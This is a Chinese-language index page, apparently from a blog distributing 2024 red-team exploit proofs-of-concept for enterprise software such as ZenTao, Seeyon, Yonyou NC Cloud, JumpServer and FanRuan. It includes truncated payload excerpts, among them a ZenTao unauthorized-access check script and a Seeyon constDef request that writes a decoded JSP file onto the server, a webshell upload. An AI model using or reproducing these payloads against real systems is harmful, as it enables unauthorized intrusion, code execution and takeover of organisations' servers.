2024你懂的 第5页
2024攻防互联网公开POC
H3C Workspace 云桌面 远程命令执行漏洞_秃兔安全
禅道研发项⽬管理系统未授权_秃兔安全

禅道研发项⽬管理系统未授权

import requests def check(url):url1 = url+’/misc-captcha-user.html’# url1 = url+’/index.php?m=misc&f=captcha&sessionVar=user’#非伪静态版本按照此格式传参# url2 = url+’/...
秃兔的头像_秃兔安全至尊玉兔秃兔1年前
08513
金和OA_uploadfileeditorsave接口存在任意文件上传漏洞_秃兔安全
用友 NC Cloud jsinvoke 任意文件上传_秃兔安全
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔1年前
010113
JumpServer(CVE-2024-29202)Jinin2模板注入漏洞_秃兔安全
KubePi存在JWT token验证绕过漏洞_秃兔安全
天问物业ERP系统ContractDownLoad存在任意文件读取漏洞_秃兔安全
紫光-电子档案管理系统-PermissionAC_秃兔安全
帆软报表 channel 远程命令执行漏洞_秃兔安全